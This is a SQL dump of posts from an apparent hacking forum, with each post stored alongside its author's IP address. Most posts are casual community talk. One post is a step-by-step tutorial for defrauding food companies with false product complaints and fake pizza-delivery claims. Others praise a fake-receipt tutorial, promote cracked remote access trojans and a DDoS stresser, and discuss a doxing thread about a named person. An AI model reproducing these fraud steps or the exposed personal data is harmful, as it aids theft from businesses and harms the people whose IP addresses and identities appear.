'sirchamp', '1350747297', '[quote=\'iTzIpod\' pid=\'5716\' dateline=\'1350745811\']\r\nNXK pushed Rave. \r\n\r\nWhy? \r\n\r\n:o\r\n\r\nWhat about my demotion? Can you explain?\r\n[/quote]\r\n\r\nHe already explained in another thread.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'dad61a3f3b441a1bc7608011a8da05f2', '0', '0'); INSERT INTO mybb_posts VALUES('5743', '1002', '5698', '3', 'RE: New mods and forum updates', '0', '1', 't3h jok3r', '1350750675', '[quote=\'R?????zo?\' pid=\'5698\' dateline=\'1350727169\']\nThanks for the updates looks nice, also lol\'ed on the last bonus pic.\nBtw the DDoS\'ers userbar is broken and forum icon is broken, also we need a clean up on the threads that\'s in there, since they are all related to Rat\'ing.\n[/quote]\n\nThanks for reminding me. I got a request to delete fearless group so forgot about the ratters group.\n\nThanks for reminding once again. I will handle it after I brush my teeth (I just woke up)\n\n[quote=\'iTzIpod\' pid=\'5738\' dateline=\'1350748064\']\nI was talking with AF yesterday. He said that he gave up on the operation on LH.\n[/quote]\n\nThat\'s good news.\n\n[b]Edited[/b]\n\nDone.', '72.231.24.165', '1223104677', '1', '0', '1', '1350752833', '1', '9bf0fdc74fa1cb41db5d9f331f0ad091', '0', '1350752833'); INSERT INTO mybb_posts VALUES('5727', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350747365', 'iTzIpod\n\nMy username :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3816e8a5e1f127c5751ba90667848f74', '0', '0'); INSERT INTO mybb_posts VALUES('5728', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '2', 'Apathy', '1350747413', 'Thanks for the tutorial. I am not a hamachi fan though.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '40c9b05af30e06adfdb14560e22d2cf0', '0', '0'); INSERT INTO mybb_posts VALUES('5729', '190', '665', '56', 'RE: Copy and paste game', '0', '53', 'sirchamp', '1350747431', '127.0.0.1\ntried dosing this.\n\n[spoiler]joke[/spoiler]', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '33eade21578a7fdba94e2ae456a465b0', '0', '0'); INSERT INTO mybb_posts VALUES('5730', '190', '665', '56', 'RE: Copy and paste game', '0', '2', 'Apathy', '1350747489', '************** One of my passwords. :P', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '0ee6145c1ceb5b4112c163d1c6340115', '0', '0'); INSERT INTO mybb_posts VALUES('5731', '126', '315', '15', 'RE: Adf.ly Bot', '0', '82', 'iTzIpod', '1350747515', 'It will. But very slowly.. I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df26715a9012d7ca5010ba2f6bf0d7d2', '0', '0'); INSERT INTO mybb_posts VALUES('5732', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '82', 'iTzIpod', '1350747557', 'Nice guide. :)\n\nThanks for the contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '24802c26ceffc62ddf51a3d9ef07821c', '0', '0'); INSERT INTO mybb_posts VALUES('5733', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '82', 'iTzIpod', '1350747633', 'I love this song.. >__> Haters gon hate.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a0bbb32fec01136fa1edc5a2f1f16cc8', '0', '0'); INSERT INTO mybb_posts VALUES('5734', '928', '5194', '49', 'RE: MOTM', '0', '82', 'iTzIpod', '1350747760', 'I\'ve noticed. Keep it up Apathy. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '06e56a10164b93b01109475bcdb2d379', '0', '0'); INSERT INTO mybb_posts VALUES('5735', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '82', 'iTzIpod', '1350747797', 'It\'s legit to get that though.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '984b8558b3b84f22c5ae875d02085fce', '0', '0'); INSERT INTO mybb_posts VALUES('5736', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '82', 'iTzIpod', '1350747941', 'I hate people that do that..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d18f28f9e01efc3dac90fd36535648c', '0', '0'); INSERT INTO mybb_posts VALUES('5737', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350747994', 'http://l33thacking.net/thread-190-page-10.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4767d38f0640475c055e9c4ad01bb5d7', '0', '0'); INSERT INTO mybb_posts VALUES('5738', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '82', 'iTzIpod', '1350748064', 'I was talking with AF yesterday. He said that he gave up on the operation on LH.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89c04d0510ad2ffeed7dd6be63b6a457', '0', '0'); INSERT INTO mybb_posts VALUES('5739', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350748227', 'why you say that?\nif you would only see without the photoshop you wouldn\'t know if it was scanned or not.', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', 'fb62752dba0bfc65be6f16d407c8cd9e', '0', '0'); INSERT INTO mybb_posts VALUES('5740', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350748324', 'yeah I love the song, when I drive to work in the morning I put the sound on max and listen to it, people always stare at my car :3', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '0067fe78c3c591e8a5638a92c97e2206', '0', '0'); INSERT INTO mybb_posts VALUES('5741', '1013', '0', '16', 'The Official Magical Book of Free Food', '0', '62', 'R?????zo?', '1350748973', '[align=center][color=#9999ff]I\'ve decided, you know what, screw multiple tutorials, I\'m making one big tutorial on every food company. If you want another, PM me, and I\'ll see what I can do. Using what you learn from this, you should really be able to SE any food company without a tutorial. \r\n\r\nThe companys I will cover in this include Pringles, Kelloggs, Dr. Pepper/Snapple, Pizza Hut/Pizza, Kraft, Sour Patch Kids, and more to come. Let\'s get started.\r\n\r\n\r\n[/color][/align]\r\n[align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n[/align][align=center] [img]http://puu.sh/1geqt[/img] \r\n[color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n\r\n[/align]\r\nPringles are a delicious snack, often consumed in large proportions, and regretted later. \r\n\r\nGo here: http://www.pringles.com/askus\r\n\r\nPut the birthday, and select Product Concern. \r\n\r\nPut the product you want, leave UPC code and manufactering code empty, NO you don\'t still have that delicious snackaroo! For the message you need to love their product, and then slowly tell them something was wrong with it. \r\n[img]http://puu.sh/1gecl[/img] \r\n\r\nNow fill out all the other stuff legit, so you can recieve your reimbursement coupons.\r\n\r\nSnap crackle pop next thing you know you\'re getting this in your inbox:\r\n\r\n[img]http://puu.sh/1geeX[/img] \r\n\r\nIf in the rare case they ask for the UPC code, (which they will if you try large amounts of cans, or call) just say it\'s not readable. Enjoy your Pringles! \r\n\r\nNOW! Onto Kelloggs!\r\n\r\n[align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n[/align][align=center] [img]http://puu.sh/1gehH[/img] \r\n[color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n\r\n[align=left]Kelloggs makes a bunch of stuff. It doesn\'t really matter what you say you bought, you\'ll be getting a coupon for any Kelloggs product. \r\n\r\nFirst hit up this link: http://www.kelloggs.com/en_US/contact-us.html\r\n\r\nPut your birthday, and select Product Concern. Continue!\r\n\r\n\r\nPut the item you want, skip UPC and manufactering codes, legit place, and a convincing story. Look below for an example. \r\n\r\n[img]http://puu.sh/1geo7[/img] \r\n\r\nPut valid shipping info, and next thing you know, you\'ve got an email like this: \r\n\r\n[img]http://puu.sh/1gepl[/img] \r\n\r\n\r\nOnto Dr. Pepper/Snapple!\r\n\r\n[align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n[/align][align=center] [img]http://puu.sh/1get3[/img] \r\n[color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n\r\n[align=left]Dr. Pepper is often considered the nector of the Gods. This is literally my favorite SE in history. Pay close attention.\r\n\r\nFirst you\'ll need to go here: http://www.drpeppersnapplegroup.com/ and figure out which drink you want.\r\n\r\nI\'m using Dr. Pepper for this, so it may not be the same as you. After you pick your drink, the contact links are below.\r\n\r\n[url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=7up&F2=7up][color=#999900]7-Up[/color][/url] \r\n[url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=rootbeer&F2=A_W][color=#663300]A&W[/color][/url] \r\n[url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=canadadry&F2=Canada_Dry&F9=http://www.canadadry.com/_external/contact/dpsg_style_loader.js.php][color=#009900]Canada Dry[/color][/url] \r\n[url=http://www.econsumeraffairs.com/am_bev/contactusmx.htm?F1=clamato&F2=Clamato][color=#ff0000]Clamato[/color][/url] (Spanish) \r\n[color=#99ff99]Country Time[/color] (Don\'t have a website)\r\n[url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=crush&F2=crush_soda][color=#ff6600]Crush [/color][/url] \r\n[color=#0000ff]Deja Blue[/color] (Don\'t have a website)\r\n[url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=dietrite&F2=Diet_Rite][color=#9999ff]Rite[/color][/url] \r\n[url=http://www.econsumeraffairs.com/am_bev/contactus.htm?F1=drpepper][color=#ff0000]Dr. Pepper[/color][/url] \r\n\r\nThere you go. Now, these are all pretty much the same, so try and follow along. \r\n\r\n\r\n\r\nFill out all the beginning info legit. Select your flavor, and leave production code blank. You should be about like this:\r\n\r\n[img]http://puu.sh/1gePV[/img] \r\n\r\nNow for comments be creative. I like to say it was really sour or bitter or something. \r\n\r\nLeave UPC blank, and fill out everything else as best as you can. Submit! \r\n\r\nNext thing you know, you\'re getting emails like this: \r\n\r\n[img]http://puu.sh/1geSo[/img] \r\n[/align]\r\n[align=left]I\'m not sure why, but I just recieved a coupon in the mail after getting this. So... You may get something different...\r\n\r\n\r\nSo! Now you\'re kind of needing some dinner! How about Pizza?!\r\n\r\n[align=center][color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color][/align][align=center] [img]http://puu.sh/1geUg[/img] \r\n[color=#ffff00][size=large]---------------------------------------------------------------------------------------------------------------------------[/size][/color]\r\n\r\n[align=left]Yum! Free pizza! Sounds good right? Well there are three ways of doing this, and it really works on any pizza place. You can of course do the illegal method, which I don\'t encourage, which is doing it over paypal and doing a chargeback after they deliver it, or you can call and make an order, and then cancel the order and continue from the 3rd line below. You can also do the way they technically gets you two pizzas for free!\r\n\r\nFirst, you\'ll actually need to order a pizza. Bummer right?! No, it will all pay off. \r\n\r\nGet your pizza delivered, and pay for it and stuff.\r\n\r\nWait a few hours or a day or so and call them people up. \r\n\r\nBe all like \"Dawg, I just ordered a pizza a little bit ago, and that driver like threw that shit on the ground or something! I threw it away, it was so gross!\"\r\nRemember you must say you threw it away. If you did the method where you cancel your order, you can do this because they\'ll check to see if the order is in their system, and it will show up that it is. But then you only get one pizza!\r\n\r\nThey\'ll most likely give you a new pizza after verifying you ordered one when you said you did. \r\n\r\nBe nice and tip the driver if they deliver!\r\n\r\n[/align][/align][/align][/align][/align][/align]', '188.140.4.193', '-1131674431', '1', '0', '0', '0', '1', '22c6eb0eb99cb73a52cd855e7d75d311', '0', '0'); INSERT INTO mybb_posts VALUES('5742', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '228', 'VirtualLegend', '1350749840', 'It looks real to me !!!\n\nNice Tutorial', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b76997a9917d7dce317325d21409c4de', '0', '0'); INSERT INTO mybb_posts VALUES('5744', '789', '4106', '19', '[Junk]ratters', '0', '1', 't3h jok3r', '1350752043', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5745', '853', '4502', '59', 'RE: My Way Of Spreading Method And Get Tons Of Installs', '0', '1', 't3h jok3r', '1350752102', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fb185229cd2d2e69935610e069eacbe1', '0', '0'); INSERT INTO mybb_posts VALUES('5746', '796', '4155', '15', 'RE: CyberGate v1.18.0 Full Version Cracked', '0', '1', 't3h jok3r', '1350752129', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ffc2bfde960fc40ac9ada46293739c21', '0', '0'); INSERT INTO mybb_posts VALUES('5747', '795', '4154', '15', 'RE: GreameRAT 1.5', '0', '1', 't3h jok3r', '1350752147', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b8f3069aceb5193afb874da278cde1b9', '0', '0'); INSERT INTO mybb_posts VALUES('5748', '797', '4156', '15', 'RE: DarkComet RAT v5.3.1', '0', '1', 't3h jok3r', '1350752154', 'Moved from the RATTERs private forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b7a82206730e01eee9fc0677f5dfac44', '0', '0'); INSERT INTO mybb_posts VALUES('5749', '798', '4157', '15', 'RE: Xtreme Rat 3.5 Cracked', '0', '1', 't3h jok3r', '1350752171', 'Moved from the RATTERs private forum.\n\nBTW, nice rat I have used it before.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2f5a0aab00d5aa3b552d6a806378888', '0', '0'); INSERT INTO mybb_posts VALUES('5750', '799', '4158', '15', 'RE: Darkcomet rat 5.4 Legacy Beta', '0', '1', 't3h jok3r', '1350752208', 'Moved from the RATTERs private forum.\n\nDownload from the link above because the site has discontinued their project.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '467835ed6728a7fbd62db1965da74138', '0', '0'); INSERT INTO mybb_posts VALUES('5751', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '1', 't3h jok3r', '1350752250', 'Best RAT ever on the internet. This RAT has a lot of vouches.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c76259364d0a2bf38737ad8c09fd1c8e', '0', '0'); INSERT INTO mybb_posts VALUES('5752', '928', '5415', '49', 'RE: MOTM', '0', '1', 't3h jok3r', '1350752968', '[quote=\'iTzIpod\' pid=\'5415\' dateline=\'1350594534\']\r\nApathy, you\'re just too inactive. You need to post more.\r\nAll everyone asks from you.\r\n\r\nAs for the thread,\r\nI think we should do this. And a LH Weekly News Series.\r\n[/quote]\r\n\r\nNews is not a bad addition either but there\'s not much happening on LH but if you can give me some suggestions on the weekly news then it would be great.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19d585e4ca4d6835927d186120f3b384', '0', '0'); INSERT INTO mybb_posts VALUES('5753', '910', '5021', '49', 'RE: Referral Contest?', '0', '1', 't3h jok3r', '1350753035', 'I came up with a couple of ideas when I was eating breakfast today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f95ffc60b3e06ee7f379b5d46830dd5d', '0', '0'); INSERT INTO mybb_posts VALUES('5754', '853', '4502', '59', 'RE: My Way Of Spreading Method And Get Tons Of Installs', '0', '258', 'PiXEL^OG', '1350754440', 'Will look into this , Thanks for the great share :D', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'ee36e1747e18f5c62969408518ae8529', '0', '0'); INSERT INTO mybb_posts VALUES('5755', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '258', 'PiXEL^OG', '1350754572', 'WOW this truly is amazing\n\n10/10 Amazing tutorial , its just absolutely amazing', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '9b677251495c2127042f5481560a0895', '0', '0'); INSERT INTO mybb_posts VALUES('5756', '1014', '0', '7', 'My awards Or My Achievements plugin ?!', '0', '228', 'VirtualLegend', '1350754961', '[align=center][size=medium][color=#32CD32]Hello,\r\n\r\nShould I implement myawards plugin which can take up to weeks or should I install my achievements and all the previous awards given would be gone.\r\n\r\n[color=#FF0000]NOTE: It\'s is Joker\'s idea, and he approves this idea[/color]\r\n\r\nWhat do you think? Post your opinion below\r\n[/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5a008d934bf07c1cfb2dccc6a04fbe40', '0', '0'); INSERT INTO mybb_posts VALUES('5757', '910', '5021', '49', 'RE: Referral Contest?', '0', '222', 'Exposé', '1350755052', 'Lol nice please share!!!! P.S what did you eat :P', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '14d52f7914790efc03c8e62bdb5d1457', '0', '0'); INSERT INTO mybb_posts VALUES('5758', '1011', '5715', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350755209', 'Thanks for the feeback, I like to contribute :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '49914556d17057220ca5e26dfa7ea894', '0', '0'); INSERT INTO mybb_posts VALUES('5759', '853', '4502', '59', 'RE: My Way Of Spreading Method And Get Tons Of Installs', '0', '62', 'R?????zo?', '1350755241', 'No problem, Enjoy guys :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '920224ddde61d7359d4d12e5530a2c8f', '0', '0'); INSERT INTO mybb_posts VALUES('5760', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '62', 'R?????zo?', '1350755302', 'The awards plugin would be nice, I think we should have that back.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd66b9d0311dec3dd599c59e45d2fb256', '0', '0'); INSERT INTO mybb_posts VALUES('5761', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '264', 'D?ea', '1350755363', 'I prefer award system.\nSo yeah.. AWARD SYSTEM!\n\nIf you guys need help, please contact me.', '87.55.196.22', '1463272470', '1', '0', '0', '0', '1', 'f0675fa1ea3e9f48322d26002449a65f', '0', '0'); INSERT INTO mybb_posts VALUES('5762', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '61', 'NXK', '1350755462', 'Thank you everyone so much.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1d2ef112b36ace25a164d3f5b1a7a973', '0', '0'); INSERT INTO mybb_posts VALUES('5763', '928', '5752', '49', 'RE: MOTM', '0', '82', 'iTzIpod', '1350755502', '[quote=\'t3h jok3r\' pid=\'5752\' dateline=\'1350752968\']\r\n[quote=\'iTzIpod\' pid=\'5415\' dateline=\'1350594534\']\r\nApathy, you\'re just too inactive. You need to post more.\r\nAll everyone asks from you.\r\n\r\nAs for the thread,\r\nI think we should do this. And a LH Weekly News Series.\r\n[/quote]\r\n\r\nNews is not a bad addition either but there\'s not much happening on LH but if you can give me some suggestions on the weekly news then it would be great.\r\n[/quote]\r\n\r\n\r\nSays any new updates on the forums\r\n(New Subforums/Forums/Usergroups, etc)\r\n\r\nMilestones\r\n(iTzIpod reached 500k posts, t3h jok3r reached 3k posts, etc)\r\n\r\nMOTW\r\n(Member of the week)\r\n\r\nMOTM (First week of every month)\r\n(Member of the month)\r\n\r\nWeekly Activity\r\n(This week\'s total posts and threads, etc)\r\n\r\nI don\'t know :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e0ef3692034df59e52b6f1bc707fb9a6', '0', '0'); INSERT INTO mybb_posts VALUES('5764', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350755533', 'What \"ideas\" did you think of?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ae7fd933799c4c42c91cf18203082667', '0', '0'); INSERT INTO mybb_posts VALUES('5765', '974', '5455', '61', 'RE: Get Abs Sitting at your Computer in 2 weeks!', '0', '62', 'R?????zo?', '1350755549', 'Not everyone has a six pack, and I would guess most of the people who\'s on this forums is actually fat :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9776d2ff81830f71164ead5eec5f7d6b', '0', '0'); INSERT INTO mybb_posts VALUES('5766', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '82', 'iTzIpod', '1350755615', '[10/19/2012 9:59:50 PM] The Anarchist | AF: Hey, we cancelled our op on LH.\n[10/19/2012 10:00:06 PM] The Anarchist | AF: Reason being, they aren\'t worth our time. Sorry if you\'re disappointed.\n[10/19/2012 10:00:56 PM] The Anarchist | AF: We\'d love to have you on the site, but we\'re no longer seeking revenge.\n[10/19/2012 10:01:17 PM] | The Anarchist | AF: We\'ve had 100+ posts just today, and I think we should focus our efforts on our site, and not theirs.\n[10/19/2012 10:01:37 PM] The Anarchist | AF: We could easily take them down eventually, but I think it\'d be more beneficial to work on our site.', '24.212.197.164', '416597412', '1', '0', '82', '1350755673', '1', '9e66f879543065e3a43a0ecb2f7d1b61', '0', '1350755673'); INSERT INTO mybb_posts VALUES('5767', '1002', '5743', '3', 'RE: New mods and forum updates', '0', '62', 'R?????zo?', '1350755662', '[quote=\'t3h jok3r\' pid=\'5743\' dateline=\'1350750675\']\r\n\r\n\r\nThanks for reminding me. I got a request to delete fearless group so forgot about the ratters group.\r\n\r\nThanks for reminding once again. I will handle it after I brush my teeth (I just woke up)\r\n[/quote]\r\n\r\nNo worries and thanks for moving the threads, looks clean now :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '09498edefb5b86d855a7c6f19ce72eb8', '0', '0'); INSERT INTO mybb_posts VALUES('5768', '910', '5021', '49', 'RE: Referral Contest?', '0', '62', 'R?????zo?', '1350755850', 'what are those ideas?\nhope you enjoy\'ed your breakfast :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a9b8fe88ae3b502f7f0fdbb57d62ff4a', '0', '0'); INSERT INTO mybb_posts VALUES('5769', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '228', 'VirtualLegend', '1350755897', '???????????\n???? ??? ??? ????? ??? ??????', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '55cad185c38b00b045e6b4a245efa0bb', '0', '0'); INSERT INTO mybb_posts VALUES('5770', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '2', 'Apathy', '1350756859', 'We had awards but the plugin got fucked up. We are working on it.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '6722b04fbcbfc489ca2277969a2d23d9', '0', '0'); INSERT INTO mybb_posts VALUES('5771', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '2', 'Apathy', '1350756964', 'I might try this. Thanks man.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '4d5ce2cbdab24c6b0440827a6fa4e9af', '0', '0'); INSERT INTO mybb_posts VALUES('5772', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '61', 'NXK', '1350757014', 'That picture at the end made me Laugh aha. Thank for everything.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a505ed0450e6aff626772ca43c8cfdd2', '0', '0'); INSERT INTO mybb_posts VALUES('5773', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '222', 'Exposé', '1350757024', 'I think the awards plugin would be nice idk...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'a953c12de55b881316c4a77e940b7e97', '0', '0'); INSERT INTO mybb_posts VALUES('5774', '1014', '5770', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '1', 't3h jok3r', '1350757382', '[quote=\'Apathy\' pid=\'5770\' dateline=\'1350756859\']\r\nWe had awards but the plugin got fucked up. We are working on it.\r\n[/quote]\r\n\r\nThere are two award plugins, myawards which we had and myachievements which we didn\'t use yet but it\'s similar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5c0b2d293c82f2fc9ce94150325744a0', '0', '0'); INSERT INTO mybb_posts VALUES('5775', '1014', '5756', '7', 'RE: My awards Or My Achievements plugin ?!', '0', '53', 'sirchamp', '1350757415', 'Achievement for the Win :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'dae5d07ed9e7590d1ac2b9470d2e4d1a', '0', '0'); INSERT INTO mybb_posts VALUES('5776', '906', '5723', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350757732', '[quote=\'Apathy\' pid=\'5723\' dateline=\'1350747148\']\r\nWhy do you guys bother so much? She sleept with a man who was dating someone else. Not cool.\r\n[/quote]\r\n\r\nShe was lonely she got a new friend so she didn\'t want to leave him.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8dcee3c854c78b617b17cb158cab27c4', '0', '0'); INSERT INTO mybb_posts VALUES('5777', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '61', 'NXK', '1350757957', 'It seems pretty nice, The surverys are really unfortunate though.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '26a9c5b418c9ecdf2acad79493acd9a1', '0', '0'); INSERT INTO mybb_posts VALUES('5778', '2', '4', '34', 'RE: Userbar tut', '0', '228', 'VirtualLegend', '1350758070', 'Awesome Tutorial, I\'m planning to make a group on LH', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '736cacaffcb39c617859dcb0cb3ba0fc', '0', '0'); INSERT INTO mybb_posts VALUES('5779', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '1', 't3h jok3r', '1350758114', 'No problem guys. \n\n[quote=\'iTzIpod\' pid=\'5766\' dateline=\'1350755615\']\n[10/19/2012 9:59:50 PM] The Anarchist | AF: Hey, we cancelled our op on LH.\n[10/19/2012 10:00:06 PM] The Anarchist | AF: Reason being, they aren\'t worth our time. Sorry if you\'re disappointed.\n[10/19/2012 10:00:56 PM] The Anarchist | AF: We\'d love to have you on the site, but we\'re no longer seeking revenge.\n[10/19/2012 10:01:17 PM] | The Anarchist | AF: We\'ve had 100+ posts just today, and I think we should focus our efforts on our site, and not theirs.\n[10/19/2012 10:01:37 PM] The Anarchist | AF: We could easily take them down eventually, but I think it\'d be more beneficial to work on our site.\n[/quote]\n\nThey couldn\'t do anything for 2 weeks so I believe they can\'t do anything.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '91bba0a3f799642ed94049870f8c1430', '0', '0'); INSERT INTO mybb_posts VALUES('5780', '1001', '5660', '7', 'RE: Shady URL', '0', '61', 'NXK', '1350758165', 'I miss doing this to people on facebook, Ahha.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '91331c35f932dfbe7f4e5f714630e901', '0', '0'); INSERT INTO mybb_posts VALUES('5781', '945', '5288', '7', 'RE: I dont want.......', '0', '67', 'HoverCatz', '1350758187', 'Leechers can still pm them and share it on other pages.. -.-', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'f1de79081030644b140a62f23257f477', '0', '0'); INSERT INTO mybb_posts VALUES('5782', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '62', 'R?????zo?', '1350758226', 'Your welcome bro :)\nLove to contribute :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9d9734cca3f148b14b504fb15328ee4b', '0', '0'); INSERT INTO mybb_posts VALUES('5783', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '62', 'R?????zo?', '1350758379', 'Poor kids, they must try harder :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ddbdcfa9b10aefdb9519f07669517f48', '0', '0'); INSERT INTO mybb_posts VALUES('5784', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '222', 'Exposé', '1350758427', 'Lmao AF are getting so desperate....what are they gonna do next', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'a8b36b271b8312e914abf99c48f66941', '0', '0'); INSERT INTO mybb_posts VALUES('5785', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '1', 't3h jok3r', '1350759665', 'Why is this thread closed?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b183d6189cbad16663dccc35c71d9fd', '0', '0'); INSERT INTO mybb_posts VALUES('5786', '945', '5781', '7', 'RE: I dont want.......', '0', '1', 't3h jok3r', '1350760291', '[quote=\'HoverCatz\' pid=\'5781\' dateline=\'1350758187\']\r\nLeechers can still pm them and share it on other pages.. -.-\r\n[/quote]\r\n\r\nTrue but I log all PMs and check all the suspicious ones. So when they do it I ban them and send a DMCA notice.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c1d0b30bb8ccf827c8439db062e3fbc3', '0', '0'); INSERT INTO mybb_posts VALUES('5787', '906', '5776', '42', 'RE: DOX of Kody Maxson', '0', '2', 'Apathy', '1350762622', '[quote=\'t3h jok3r\' pid=\'5776\' dateline=\'1350757732\']\r\n[quote=\'Apathy\' pid=\'5723\' dateline=\'1350747148\']\r\nWhy do you guys bother so much? She sleept with a man who was dating someone else. Not cool.\r\n[/quote]\r\n\r\nShe was lonely she got a new friend so she didn\'t want to leave him.\r\n[/quote]\r\n\r\nI understand that. I feel for her but she should have thought of the consequences. (not the suicide but that people would be mad at her)', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '4c74c64fe367d8e8e5f2a3b13224ee06', '0', '0'); INSERT INTO mybb_posts VALUES('5788', '945', '5288', '7', 'RE: I dont want.......', '0', '3', '??????????¢™', '1350763250', 'Its going to be post and PM for a while or Post here and I pm you.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '21e80e553406d989d3d01287972627b8', '0', '0'); INSERT INTO mybb_posts VALUES('5789', '1002', '5666', '3', 'RE: New mods and forum updates', '0', '3', '??????????¢™', '1350763410', 'I was the one that showed that screenshotted that pic at the end. LOL', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '8b682b478d37ca1cffade952bef55d15', '0', '0'); INSERT INTO 